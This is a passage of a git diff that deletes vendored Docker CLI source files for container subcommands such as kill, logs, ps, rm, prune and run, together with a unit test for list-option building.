{ - restoreOnce.Do(func() { - restoreTerminal(streams, inputStream) - }) - } - logrus.Debug("[hijack] End of stdin") - } - - if err := resp.CloseWrite(); err != nil { - logrus.Debugf("Couldn't send EOF: %s", err) - } - close(stdinDone) - }() - - select { - case err := <-receiveStdout: - if err != nil { - logrus.Debugf("Error receiveStdout: %s", err) - return err - } - case <-stdinDone: - if outputStream != nil || errorStream != nil { - select { - case err := <-receiveStdout: - if err != nil { - logrus.Debugf("Error receiveStdout: %s", err) - return err - } - case <-ctx.Done(): - } - } - case <-ctx.Done(): - } - - return nil -} - -func setRawTerminal(streams command.Streams) error { - if err := streams.In().SetRawTerminal(); err != nil { - return err - } - return streams.Out().SetRawTerminal() -} - -func restoreTerminal(streams command.Streams, in io.Closer) error { - streams.In().RestoreTerminal() - streams.Out().RestoreTerminal() - // WARNING: DO NOT REMOVE THE OS CHECK !!! - // For some reason this Close call blocks on darwin.. - // As the client exists right after, simply discard the close - // until we find a better solution. - if in != nil && runtime.GOOS != "darwin" { - return in.Close() - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/inspect.go b/vendor/github.com/docker/docker/cli/command/container/inspect.go deleted file mode 100644 index 08a8d244df..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/inspect.go +++ /dev/null @@ -1,47 +0,0 @@ -package container - -import ( - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/inspect" - "github.com/spf13/cobra" -) - -type inspectOptions struct { - format string - size bool - refs []string -} - -// newInspectCommand creates a new cobra.Command for `docker container inspect` -func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts inspectOptions - - cmd := &cobra.Command{ - Use: "inspect [OPTIONS] CONTAINER [CONTAINER...]", - Short: "Display detailed information on one or more containers", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.refs = args - return runInspect(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") - flags.BoolVarP(&opts.size, "size", "s", false, "Display total file sizes") - - return cmd -} - -func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - getRefFunc := func(ref string) (interface{}, []byte, error) { - return client.ContainerInspectWithRaw(ctx, ref, opts.size) - } - return inspect.Inspect(dockerCli.Out(), opts.refs, opts.format, getRefFunc) -} diff --git a/vendor/github.com/docker/docker/cli/command/container/kill.go b/vendor/github.com/docker/docker/cli/command/container/kill.go deleted file mode 100644 index 6da91a40e3..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/kill.go +++ /dev/null @@ -1,56 +0,0 @@ -package container - -import ( - "fmt" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type killOptions struct { - signal string - - containers []string -} - -// NewKillCommand creates a new cobra.Command for `docker kill` -func NewKillCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts killOptions - - cmd := &cobra.Command{ - Use: "kill [OPTIONS] CONTAINER [CONTAINER...]", - Short: "Kill one or more running containers", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.containers = args - return runKill(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.StringVarP(&opts.signal, "signal", "s", "KILL", "Signal to send to the container") - return cmd -} - -func runKill(dockerCli *command.DockerCli, opts *killOptions) error { - var errs []string - ctx := context.Background() - errChan := parallelOperation(ctx, opts.containers, func(ctx context.Context, container string) error { - return dockerCli.Client().ContainerKill(ctx, container, opts.signal) - }) - for _, name := range opts.containers { - if err := <-errChan; err != nil { - errs = append(errs, err.Error()) - } else { - fmt.Fprintf(dockerCli.Out(), "%s\n", name) - } - } - if len(errs) > 0 { - return fmt.Errorf("%s", strings.Join(errs, "\n")) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/list.go b/vendor/github.com/docker/docker/cli/command/container/list.go deleted file mode 100644 index 5bbf41966d..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/list.go +++ /dev/null @@ -1,141 +0,0 @@ -package container - -import ( - "io/ioutil" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/formatter" - "github.com/docker/docker/opts" - "github.com/docker/docker/utils/templates" - "github.com/spf13/cobra" -) - -type psOptions struct { - quiet bool - size bool - all bool - noTrunc bool - nLatest bool - last int - format string - filter opts.FilterOpt -} - -// NewPsCommand creates a new cobra.Command for `docker ps` -func NewPsCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := psOptions{filter: opts.NewFilterOpt()} - - cmd := &cobra.Command{ - Use: "ps [OPTIONS]", - Short: "List containers", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runPs(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - - flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display numeric IDs") - flags.BoolVarP(&opts.size, "size", "s", false, "Display total file sizes") - flags.BoolVarP(&opts.all, "all", "a", false, "Show all containers (default shows just running)") - flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output") - flags.BoolVarP(&opts.nLatest, "latest", "l", false, "Show the latest created container (includes all states)") - flags.IntVarP(&opts.last, "last", "n", -1, "Show n last created containers (includes all states)") - flags.StringVarP(&opts.format, "format", "", "", "Pretty-print containers using a Go template") - flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") - - return cmd -} - -func newListCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := *NewPsCommand(dockerCli) - cmd.Aliases = []string{"ps", "list"} - cmd.Use = "ls [OPTIONS]" - return &cmd -} - -// listOptionsProcessor is used to set any container list options which may only -// be embedded in the format template. -// This is passed directly into tmpl.Execute in order to allow the preprocessor -// to set any list options that were not provided by flags (e.g. `.Size`). -// It is using a `map[string]bool` so that unknown fields passed into the -// template format do not cause errors. These errors will get picked up when -// running through the actual template processor. -type listOptionsProcessor map[string]bool - -// Size sets the size of the map when called by a template execution. -func (o listOptionsProcessor) Size() bool { - o["size"] = true - return true -} - -// Label is needed here as it allows the correct pre-processing -// because Label() is a method with arguments -func (o listOptionsProcessor) Label(name string) string { - return "" -} - -func buildContainerListOptions(opts *psOptions) (*types.ContainerListOptions, error) { - options := &types.ContainerListOptions{ - All: opts.all, - Limit: opts.last, - Size: opts.size, - Filters: opts.filter.Value(), - } - - if opts.nLatest && opts.last == -1 { - options.Limit = 1 - } - - tmpl, err := templates.Parse(opts.format) - - if err != nil { - return nil, err - } - - optionsProcessor := listOptionsProcessor{} - // This shouldn't error out but swallowing the error makes it harder - // to track down if preProcessor issues come up. Ref #24696 - if err := tmpl.Execute(ioutil.Discard, optionsProcessor); err != nil { - return nil, err - } - // At the moment all we need is to capture .Size for preprocessor - options.Size = opts.size || optionsProcessor["size"] - - return options, nil -} - -func runPs(dockerCli *command.DockerCli, opts *psOptions) error { - ctx := context.Background() - - listOptions, err := buildContainerListOptions(opts) - if err != nil { - return err - } - - containers, err := dockerCli.Client().ContainerList(ctx, *listOptions) - if err != nil { - return err - } - - format := opts.format - if len(format) == 0 { - if len(dockerCli.ConfigFile().PsFormat) > 0 && !opts.quiet { - format = dockerCli.ConfigFile().PsFormat - } else { - format = formatter.TableFormatKey - } - } - - containerCtx := formatter.Context{ - Output: dockerCli.Out(), - Format: formatter.NewContainerFormat(format, opts.quiet, listOptions.Size), - Trunc: !opts.noTrunc, - } - return formatter.ContainerWrite(containerCtx, containers) -} diff --git a/vendor/github.com/docker/docker/cli/command/container/logs.go b/vendor/github.com/docker/docker/cli/command/container/logs.go deleted file mode 100644 index 3a37cedf43..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/logs.go +++ /dev/null @@ -1,87 +0,0 @@ -package container - -import ( - "fmt" - "io" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/stdcopy" - "github.com/spf13/cobra" -) - -var validDrivers = map[string]bool{ - "json-file": true, - "journald": true, -} - -type logsOptions struct { - follow bool - since string - timestamps bool - details bool - tail string - - container string -} - -// NewLogsCommand creates a new cobra.Command for `docker logs` -func NewLogsCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts logsOptions - - cmd := &cobra.Command{ - Use: "logs [OPTIONS] CONTAINER", - Short: "Fetch the logs of a container", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.container = args[0] - return runLogs(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.follow, "follow", "f", false, "Follow log output") - flags.StringVar(&opts.since, "since", "", "Show logs since timestamp") - flags.BoolVarP(&opts.timestamps, "timestamps", "t", false, "Show timestamps") - flags.BoolVar(&opts.details, "details", false, "Show extra details provided to logs") - flags.StringVar(&opts.tail, "tail", "all", "Number of lines to show from the end of the logs") - return cmd -} - -func runLogs(dockerCli *command.DockerCli, opts *logsOptions) error { - ctx := context.Background() - - c, err := dockerCli.Client().ContainerInspect(ctx, opts.container) - if err != nil { - return err - } - - if !validDrivers[c.HostConfig.LogConfig.Type] { - return fmt.Errorf("\"logs\" command is supported only for \"json-file\" and \"journald\" logging drivers (got: %s)", c.HostConfig.LogConfig.Type) - } - - options := types.ContainerLogsOptions{ - ShowStdout: true, - ShowStderr: true, - Since: opts.since, - Timestamps: opts.timestamps, - Follow: opts.follow, - Tail: opts.tail, - Details: opts.details, - } - responseBody, err := dockerCli.Client().ContainerLogs(ctx, opts.container, options) - if err != nil { - return err - } - defer responseBody.Close() - - if c.Config.Tty { - _, err = io.Copy(dockerCli.Out(), responseBody) - } else { - _, err = stdcopy.StdCopy(dockerCli.Out(), dockerCli.Err(), responseBody) - } - return err -} diff --git a/vendor/github.com/docker/docker/cli/command/container/pause.go b/vendor/github.com/docker/docker/cli/command/container/pause.go deleted file mode 100644 index 6817cf60eb..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/pause.go +++ /dev/null @@ -1,49 +0,0 @@ -package container - -import ( - "fmt" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type pauseOptions struct { - containers []string -} - -// NewPauseCommand creates a new cobra.Command for `docker pause` -func NewPauseCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts pauseOptions - - return &cobra.Command{ - Use: "pause CONTAINER [CONTAINER...]", - Short: "Pause all processes within one or more containers", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.containers = args - return runPause(dockerCli, &opts) - }, - } -} - -func runPause(dockerCli *command.DockerCli, opts *pauseOptions) error { - ctx := context.Background() - - var errs []string - errChan := parallelOperation(ctx, opts.containers, dockerCli.Client().ContainerPause) - for _, container := range opts.containers { - if err := <-errChan; err != nil { - errs = append(errs, err.Error()) - } else { - fmt.Fprintf(dockerCli.Out(), "%s\n", container) - } - } - if len(errs) > 0 { - return fmt.Errorf("%s", strings.Join(errs, "\n")) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/port.go b/vendor/github.com/docker/docker/cli/command/container/port.go deleted file mode 100644 index ea15290145..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/port.go +++ /dev/null @@ -1,78 +0,0 @@ -package container - -import ( - "fmt" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/go-connections/nat" - "github.com/spf13/cobra" -) - -type portOptions struct { - container string - - port string -} - -// NewPortCommand creates a new cobra.Command for `docker port` -func NewPortCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts portOptions - - cmd := &cobra.Command{ - Use: "port CONTAINER [PRIVATE_PORT[/PROTO]]", - Short: "List port mappings or a specific mapping for the container", - Args: cli.RequiresRangeArgs(1, 2), - RunE: func(cmd *cobra.Command, args []string) error { - opts.container = args[0] - if len(args) > 1 { - opts.port = args[1] - } - return runPort(dockerCli, &opts) - }, - } - return cmd -} - -func runPort(dockerCli *command.DockerCli, opts *portOptions) error { - ctx := context.Background() - - c, err := dockerCli.Client().ContainerInspect(ctx, opts.container) - if err != nil { - return err - } - - if opts.port != "" { - port := opts.port - proto := "tcp" - parts := strings.SplitN(port, "/", 2) - - if len(parts) == 2 && len(parts[1]) != 0 { - port = parts[0] - proto = parts[1] - } - natPort := port + "/" + proto - newP, err := nat.NewPort(proto, port) - if err != nil { - return err - } - if frontends, exists := c.NetworkSettings.Ports[newP]; exists && frontends != nil { - for _, frontend := range frontends { - fmt.Fprintf(dockerCli.Out(), "%s:%s\n", frontend.HostIP, frontend.HostPort) - } - return nil - } - return fmt.Errorf("Error: No public port '%s' published for %s", natPort, opts.container) - } - - for from, frontends := range c.NetworkSettings.Ports { - for _, frontend := range frontends { - fmt.Fprintf(dockerCli.Out(), "%s -> %s:%s\n", from, frontend.HostIP, frontend.HostPort) - } - } - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/prune.go b/vendor/github.com/docker/docker/cli/command/container/prune.go deleted file mode 100644 index 064f4c08e0..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/prune.go +++ /dev/null @@ -1,75 +0,0 @@ -package container - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - units "github.com/docker/go-units" - "github.com/spf13/cobra" -) - -type pruneOptions struct { - force bool -} - -// NewPruneCommand returns a new cobra prune command for containers -func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts pruneOptions - - cmd := &cobra.Command{ - Use: "prune [OPTIONS]", - Short: "Remove all stopped containers", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - spaceReclaimed, output, err := runPrune(dockerCli, opts) - if err != nil { - return err - } - if output != "" { - fmt.Fprintln(dockerCli.Out(), output) - } - fmt.Fprintln(dockerCli.Out(), "Total reclaimed space:", units.HumanSize(float64(spaceReclaimed))) - return nil - }, - Tags: map[string]string{"version": "1.25"}, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation") - - return cmd -} - -const warning = `WARNING! This will remove all stopped containers. -Are you sure you want to continue?` - -func runPrune(dockerCli *command.DockerCli, opts pruneOptions) (spaceReclaimed uint64, output string, err error) { - if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), warning) { - return - } - - report, err := dockerCli.Client().ContainersPrune(context.Background(), filters.Args{}) - if err != nil { - return - } - - if len(report.ContainersDeleted) > 0 { - output = "Deleted Containers:\n" - for _, id := range report.ContainersDeleted { - output += id + "\n" - } - spaceReclaimed = report.SpaceReclaimed - } - - return -} - -// RunPrune calls the Container Prune API -// This returns the amount of space reclaimed and a detailed output string -func RunPrune(dockerCli *command.DockerCli) (uint64, string, error) { - return runPrune(dockerCli, pruneOptions{force: true}) -} diff --git a/vendor/github.com/docker/docker/cli/command/container/ps_test.go b/vendor/github.com/docker/docker/cli/command/container/ps_test.go deleted file mode 100644 index 62b0545274..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/ps_test.go +++ /dev/null @@ -1,118 +0,0 @@ -package container - -import ( - "testing" - - "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestBuildContainerListOptions(t *testing.T) { - filters := opts.NewFilterOpt() - assert.NilError(t, filters.Set("foo=bar")) - assert.NilError(t, filters.Set("baz=foo")) - - contexts := []struct { - psOpts *psOptions - expectedAll bool - expectedSize bool - expectedLimit int - expectedFilters map[string]string - }{ - { - psOpts: &psOptions{ - all: true, - size: true, - last: 5, - filter: filters, - }, - expectedAll: true, - expectedSize: true, - expectedLimit: 5, - expectedFilters: map[string]string{ - "foo": "bar", - "baz": "foo", - }, - }, - { - psOpts: &psOptions{ - all: true, - size: true, - last: -1, - nLatest: true, - }, - expectedAll: true, - expectedSize: true, - expectedLimit: 1, - expectedFilters: make(map[string]string), - }, - { - psOpts: &psOptions{ - all: true, - size: false, - last: 5, - filter: filters, - // With .Size, size should be true - format: "{{.Size}}", - }, - expectedAll: true, - expectedSize: true, - expectedLimit: 5, - expectedFilters: map[string]string{ - "foo": "bar", - "baz": "foo", - }, - }, - { - psOpts: &psOptions{ - all: true, - size: false, - last: 5, - filter: filters, - // With .Size, size should be true - format: "{{.Size}} {{.CreatedAt}} {{.Networks}}", - }, - expectedAll: true, - expectedSize: true, - expectedLimit: 5, - expectedFilters: map[string]string{ - "foo": "bar", - "baz": "foo", - }, - }, - { - psOpts: &psOptions{ - all: true, - size: false, - last: 5, - filter: filters, - // Without .Size, size should be false - format: "{{.CreatedAt}} {{.Networks}}", - }, - expectedAll: true, - expectedSize: false, - expectedLimit: 5, - expectedFilters: map[string]string{ - "foo": "bar", - "baz": "foo", - }, - }, - } - - for _, c := range contexts { - options, err := buildContainerListOptions(c.psOpts) - assert.NilError(t, err) - - assert.Equal(t, c.expectedAll, options.All) - assert.Equal(t, c.expectedSize, options.Size) - assert.Equal(t, c.expectedLimit, options.Limit) - assert.Equal(t, options.Filters.Len(), len(c.expectedFilters)) - - for k, v := range c.expectedFilters { - f := options.Filters - if !f.ExactMatch(k, v) { - t.Fatalf("Expected filter with key %s to be %s but got %s", k, v, f.Get(k)) - } - } - } -} diff --git a/vendor/github.com/docker/docker/cli/command/container/rename.go b/vendor/github.com/docker/docker/cli/command/container/rename.go deleted file mode 100644 index 346fb7b3b9..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/rename.go +++ /dev/null @@ -1,51 +0,0 @@ -package container - -import ( - "fmt" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type renameOptions struct { - oldName string - newName string -} - -// NewRenameCommand creates a new cobra.Command for `docker rename` -func NewRenameCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts renameOptions - - cmd := &cobra.Command{ - Use: "rename CONTAINER NEW_NAME", - Short: "Rename a container", - Args: cli.ExactArgs(2), - RunE: func(cmd *cobra.Command, args []string) error { - opts.oldName = args[0] - opts.newName = args[1] - return runRename(dockerCli, &opts) - }, - } - return cmd -} - -func runRename(dockerCli *command.DockerCli, opts *renameOptions) error { - ctx := context.Background() - - oldName := strings.TrimSpace(opts.oldName) - newName := strings.TrimSpace(opts.newName) - - if oldName == "" || newName == "" { - return fmt.Errorf("Error: Neither old nor new names may be empty") - } - - if err := dockerCli.Client().ContainerRename(ctx, oldName, newName); err != nil { - fmt.Fprintf(dockerCli.Err(), "%s\n", err) - return fmt.Errorf("Error: failed to rename container named %s", oldName) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/restart.go b/vendor/github.com/docker/docker/cli/command/container/restart.go deleted file mode 100644 index fc3ba93c84..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/restart.go +++ /dev/null @@ -1,62 +0,0 @@ -package container - -import ( - "fmt" - "strings" - "time" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type restartOptions struct { - nSeconds int - nSecondsChanged bool - - containers []string -} - -// NewRestartCommand creates a new cobra.Command for `docker restart` -func NewRestartCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts restartOptions - - cmd := &cobra.Command{ - Use: "restart [OPTIONS] CONTAINER [CONTAINER...]", - Short: "Restart one or more containers", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.containers = args - opts.nSecondsChanged = cmd.Flags().Changed("time") - return runRestart(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.IntVarP(&opts.nSeconds, "time", "t", 10, "Seconds to wait for stop before killing the container") - return cmd -} - -func runRestart(dockerCli *command.DockerCli, opts *restartOptions) error { - ctx := context.Background() - var errs []string - var timeout *time.Duration - if opts.nSecondsChanged { - timeoutValue := time.Duration(opts.nSeconds) * time.Second - timeout = &timeoutValue - } - - for _, name := range opts.containers { - if err := dockerCli.Client().ContainerRestart(ctx, name, timeout); err != nil { - errs = append(errs, err.Error()) - } else { - fmt.Fprintf(dockerCli.Out(), "%s\n", name) - } - } - if len(errs) > 0 { - return fmt.Errorf("%s", strings.Join(errs, "\n")) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/rm.go b/vendor/github.com/docker/docker/cli/command/container/rm.go deleted file mode 100644 index 60724f194b..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/rm.go +++ /dev/null @@ -1,73 +0,0 @@ -package container - -import ( - "fmt" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type rmOptions struct { - rmVolumes bool - rmLink bool - force bool - - containers []string -} - -// NewRmCommand creates a new cobra.Command for `docker rm` -func NewRmCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts rmOptions - - cmd := &cobra.Command{ - Use: "rm [OPTIONS] CONTAINER [CONTAINER...]", - Short: "Remove one or more containers", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.containers = args - return runRm(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.rmVolumes, "volumes", "v", false, "Remove the volumes associated with the container") - flags.BoolVarP(&opts.rmLink, "link", "l", false, "Remove the specified link") - flags.BoolVarP(&opts.force, "force", "f", false, "Force the removal of a running container (uses SIGKILL)") - return cmd -} - -func runRm(dockerCli *command.DockerCli, opts *rmOptions) error { - ctx := context.Background() - - var errs []string - options := types.ContainerRemoveOptions{ - RemoveVolumes: opts.rmVolumes, - RemoveLinks: opts.rmLink, - Force: opts.force, - } - - errChan := parallelOperation(ctx, opts.containers, func(ctx context.Context, container string) error { - if container == "" { - return fmt.Errorf("Container name cannot be empty") - } - container = strings.Trim(container, "/") - return dockerCli.Client().ContainerRemove(ctx, container, options) - }) - - for _, name := range opts.containers { - if err := <-errChan; err != nil { - errs = append(errs, err.Error()) - } else { - fmt.Fprintf(dockerCli.Out(), "%s\n", name) - } - } - if len(errs) > 0 { - return fmt.Errorf("%s", strings.Join(errs, "\n")) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/run.go b/vendor/github.com/docker/docker/cli/command/container/run.go deleted file mode 100644 index 0fad93e688..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/run.go +++ /dev/null @@ -1,285 +0,0 @@ -package container - -import ( - "fmt" - "io" - "net/http/httputil" - "os" - "runtime" - "strings" - "syscall" - - "golang.org/x/net/context" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - opttypes "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/promise" - "github.com/docker/docker/pkg/signal" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/docker/libnetwork/resolvconf/dns" - "github.com/spf13/cobra" - "github.com/spf13/pflag" -) - -type runOptions struct { - detach bool - sigProxy bool - name string - detachKeys string -} - -// NewRunCommand create a new `docker run` command -func NewRunCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts runOptions - var copts *runconfigopts.ContainerOptions - - cmd := &cobra.Command{ - Use: "run [OPTIONS] IMAGE [COMMAND] [ARG...]", - Short: "Run a command in a new container", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - copts.Image = args[0] - if len(args) > 1 { - copts.Args = args[1:] - } - return runRun(dockerCli, cmd.Flags(), &opts, copts) - }, - } - - flags := cmd.Flags() - flags.SetInterspersed(false) - - // These are flags not stored in Config/HostConfig - flags.BoolVarP(&opts.detach, "detach", "d", false, "Run container in background and print container ID") - flags.BoolVar(&opts.sigProxy, "sig-proxy", true, "Proxy received signals to the process") - flags.StringVar(&opts.name, "name", "", "Assign a name to the container") - flags.StringVar(&opts.detachKeys, "detach-keys", "", "Override the key sequence for detaching a container") - - // Add an explicit help that doesn't have a `-h` to prevent the conflict - // with hostname - flags.Bool("help", false, "Print usage") - - command.AddTrustedFlags(flags, true) - copts = runconfigopts.AddFlags(flags) - return cmd -} - -func runRun(dockerCli *command.DockerCli, flags *pflag.FlagSet, opts *runOptions, copts *runconfigopts.ContainerOptions) error { - stdout, stderr, stdin := dockerCli.Out(), dockerCli.Err(), dockerCli.In() - client := dockerCli.Client() - // TODO: pass this as an argument - cmdPath := "run" - - var ( - flAttach *opttypes.ListOpts - ErrConflictAttachDetach = fmt.Errorf("Conflicting options: -a and -d") - ErrConflictRestartPolicyAndAutoRemove = fmt.Errorf("Conflicting options: --restart and --rm") - ) - - config, hostConfig, networkingConfig, err := runconfigopts.Parse(flags, copts) - - // just in case the Parse does not exit - if err != nil { - reportError(stderr, cmdPath, err.Error(), true) - return cli.StatusError{StatusCode: 125} - } - - if hostConfig.AutoRemove && !hostConfig.RestartPolicy.IsNone() { - return ErrConflictRestartPolicyAndAutoRemove - } - if hostConfig.OomKillDisable != nil && *hostConfig.OomKillDisable && hostConfig.Memory == 0 { - fmt.Fprintf(stderr, "WARNING: Disabling the OOM killer on containers without setting a '-m/--memory' limit may be dangerous.\n") - } - - if len(hostConfig.DNS) > 0 { - // check the DNS settings passed via --dns against - // localhost regexp to warn if they are trying to - // set a DNS to a localhost address - for _, dnsIP := range hostConfig.DNS { - if dns.IsLocalhost(dnsIP) { - fmt.Fprintf(stderr, "WARNING: Localhost DNS setting (--dns=%s) may fail in containers.\n", dnsIP) - break - } - } - } - - config.ArgsEscaped = false - - if !opts.detach { - if err := dockerCli.In().CheckTty(config.AttachStdin, config.Tty); err != nil { - return err - } - } else { - if fl := flags.Lookup("attach"); fl != nil { - flAttach = fl.Value.(*opttypes.ListOpts) - if flAttach.Len() != 0 { - return ErrConflictAttachDetach - } - } - - config.AttachStdin = false - config.AttachStdout = false - config.AttachStderr = false - config.StdinOnce = false - } - - // Disable sigProxy when in TTY mode - if config.Tty { - opts.sigProxy = false - } - - // Telling the Windows daemon the initial size of the tty during start makes - // a far better user experience rather than relying on subsequent resizes - // to cause things to catch up. - if runtime.GOOS == "windows" { - hostConfig.ConsoleSize[0], hostConfig.ConsoleSize[1] = dockerCli.Out().GetTtySize() - } - - ctx, cancelFun := context.WithCancel(context.Background()) - - createResponse, err := createContainer(ctx, dockerCli, config, hostConfig, networkingConfig, hostConfig.ContainerIDFile, opts.name) - if err != nil { - reportError(stderr, cmdPath, err.Error(), true) - return runStartContainerErr(err) - } - if opts.sigProxy { - sigc := ForwardAllSignals(ctx, dockerCli, createResponse.ID) - defer signal.StopCatch(sigc) - } - var ( - waitDisplayID chan struct{} - errCh chan error - ) - if !config.AttachStdout && !config.AttachStderr { - // Make this asynchronous to allow the client to write to stdin before having to read the ID - waitDisplayID = make(chan struct{}) - go func() { - defer close(waitDisplayID) - fmt.Fprintf(stdout, "%s\n", createResponse.ID) - }() - } - attach := config.AttachStdin || config.AttachStdout || config.AttachStderr - if attach { - var ( - out, cerr io.Writer - in io.ReadCloser - ) - if config.AttachStdin { - in = stdin - } - if config.AttachStdout { - out = stdout - } - if config.AttachStderr { - if config.Tty { - cerr = stdout - } else { - cerr = stderr - } - } - - if opts.detachKeys != "" { - dockerCli.ConfigFile().DetachKeys = opts.detachKeys - } - - options := types.ContainerAttachOptions{ - Stream: true, - Stdin: config.AttachStdin, - Stdout: config.AttachStdout, - Stderr: config.AttachStderr, - DetachKeys: dockerCli.ConfigFile().DetachKeys, - } - - resp, errAttach := client.ContainerAttach(ctx, createResponse.ID, options) - if errAttach != nil && errAttach != httputil.ErrPersistEOF { - // ContainerAttach returns an ErrPersistEOF (connection closed) - // means server met an error and put it in Hijacked connection - // keep the error and read detailed error message from hijacked connection later - return errAttach - } - defer resp.Close() - - errCh = promise.Go(func() error { - errHijack := holdHijackedConnection(ctx, dockerCli, config.Tty, in, out, cerr, resp) - if errHijack == nil { - return errAttach - } - return errHijack - }) - } - - statusChan := waitExitOrRemoved(ctx, dockerCli, createResponse.ID, hostConfig.AutoRemove) - - //start the container - if err := client.ContainerStart(ctx, createResponse.ID, types.ContainerStartOptions{}); err != nil { - // If we have holdHijackedConnection, we should notify - // holdHijackedConnection we are going to exit and wait - // to avoid the terminal are not restored. - if attach { - cancelFun() - <-errCh - } - - reportError(stderr, cmdPath, err.Error(), false) - if hostConfig.AutoRemove { - // wait container to be removed - <-statusChan - } - return runStartContainerErr(err) - } - - if (config.AttachStdin || config.AttachStdout || config.AttachStderr) && config.Tty && dockerCli.Out().IsTerminal() { - if err := MonitorTtySize(ctx, dockerCli, createResponse.ID, false); err != nil { - fmt.Fprintf(stderr, "Error monitoring TTY size: %s\n", err) - } - } - - if errCh != nil { - if err := <-errCh; err != nil { - logrus.Debugf("Error hijack: %s", err) - return err - } - } - - // Detached mode: wait for the id to be displayed and return. - if !config.AttachStdout && !config.AttachStderr { - // Detached mode - <-waitDisplayID - return nil - } - - status := <-statusChan - if status != 0 { - return cli.StatusError{StatusCode: status} - } - return nil -} - -// reportError is a utility method that prints a user-friendly message -// containing the error that occurred during parsing and a suggestion to get help -func reportError(stderr io.Writer, name string, str string, withHelp bool) { - if withHelp { - str += ".\nSee '" + os.Args[0] + " " + name + " --help'" - } - fmt.Fprintf(stderr, "%s: %s.\n", os.Args[0], str) -} - -// if container start fails with 'not found'/'no such' error, return 127 -// if container start fails with 'permission denied' error, return 126 -// return 125 for generic docker daemon failures -func runStartContainerErr(err error) error { - trimmedErr := strings.TrimPrefix(err.Error(), "Error response from 